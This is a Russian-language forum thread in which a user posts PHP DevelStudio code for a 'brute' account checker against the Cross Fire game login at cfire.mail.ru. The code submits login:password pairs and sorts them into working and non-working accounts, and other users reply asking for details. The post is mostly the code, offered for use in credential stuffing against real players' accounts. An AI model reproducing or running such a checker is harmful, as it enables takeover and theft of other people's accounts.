1. Новый раздел и сервер Discord!
    Смотри новость ТЫК

создаём брут на PHP DV (я создаю брут для CF)

Тема в разделе "Программирование", создана пользователем Денипвц, 6 авг 2013.

?

тема нормальная?

  1. да

    9 голосов
    50,0%
  2. нет

    9 голосов
    50,0%
  1. Оффлайн

    Денипвц

    186
    36
    44
    Всем привет.

    Сейчас я расскажу как создать однопоточный чекер на аккаунты в Cross Fire,в программе PHP Devel Studio.
    Компоненты:
    -edit (2x);
    -button;
    -memo (2x);
    -myFunc;
    На кнопку вешаем код:
    Код:
    $text = c("edit1")->text;// задаем значение переменной
    $text1 = c("edit2")->text;//задаем значение переменной
    if ($text == ""  or $text1 == ""){ // условие: если переменная $text пустая или переменная $text1 пустая, тогда
    echo 'Заполните все поля!'; // выводим сообщение
    }else{// иначе
    myFunc1();// выполняем фк-цию
    } 
    В myFunc1 пишем:
    Код:
    $login = c("edit1")->text;// задаем значение переменной
    $pass = c("edit2")->text;// задаем значение переменной
     
    $ch = curl_init('http://cfire.mail.ru/auth/login/?');// инициализируем сеанс
     
    curl_setopt($ch, CURLOPT_POST, TRUE);// говорим что будем делать post запрос
    curl_setopt($ch, CURLOPT_HEADER, TRUE);// будем получать заголовки
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'login='.$login.'&password='.$pass.'&sumbit=%C2%EE%E9%F2%E8&remember=');// post запрос который будет отправляться
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);// что бы записать результать в переменную, а не сразу вывести его
    $result = curl_exec($ch);// отправляем cURL запрос
    if(preg_match("/sendpass/", $result)){// проверяем на соотвествие регулярному выражению, если слово sendpass в переменной $result есть тогда
    c("memo2")->text .= _BR_.$login. " : " .$pass;// записываем в memo2 результат (не рабочие акки)
    }else{// иначе
     
    c("memo1")->text .= _BR_.$login. ":" .$pass;// записываем результат в memo1 (рабочие акки)
    curl_setopt($ch, CURLOP_URL, 'http://cfire.mail.ru/auth/');
    curl_setopt($ch, CURLOPT_POST, true);//ГОВОРиим что будем отправлять post запрос
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'logout');// наш post запрос
    curl_exec($ch);// выходим с акка
    }
    curl_close($ch);// завершаем cURL сеанс 
    ребят кому не трудно : сделайте видео.
    жду спасибок=)
     
    kent_228_228_ нравится это.
  2.  
  3. Оффлайн

    Денипвц

    186
    36
    44
    жду одобрения!=)
     
    kent_228_228_ нравится это.
  4. Оффлайн

    bick_bazuka_74

    417
    220
    32
    подробно всё напиши
     
    kent_228_228_ нравится это.
  5. Оффлайн

    Денипвц

    186
    36
    44
    если ты не шаришь в PHP то..
     
    kent_228_228_ нравится это.
  6. Интересно и работает ли она у тебя? Тут не вся информация программа не соберется!
     
  7. Оффлайн

    Денипвц

    186
    36
    44
    да, я её опробывал (по инструкции), сейчас пхп бросил, перешёл на Delphi
     
  8. Оффлайн

    kent_228_228_ ШколоХакер 88 LvL

    280
    94
    54
    А это для какой версии PHP devel Studio
     
  9. Можеш в 3.0 делать, а лудше иди в Delphy
     
  10. Оффлайн

    kent_228_228_ ШколоХакер 88 LvL

    280
    94
    54
    Я там и там
     
  11. Оффлайн

    srdtu

    3
    0
    1
    как пользоваца MGamesPlatforms Checker v1.0 !!подскажи если заешь
     

Поделиться этой страницей

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!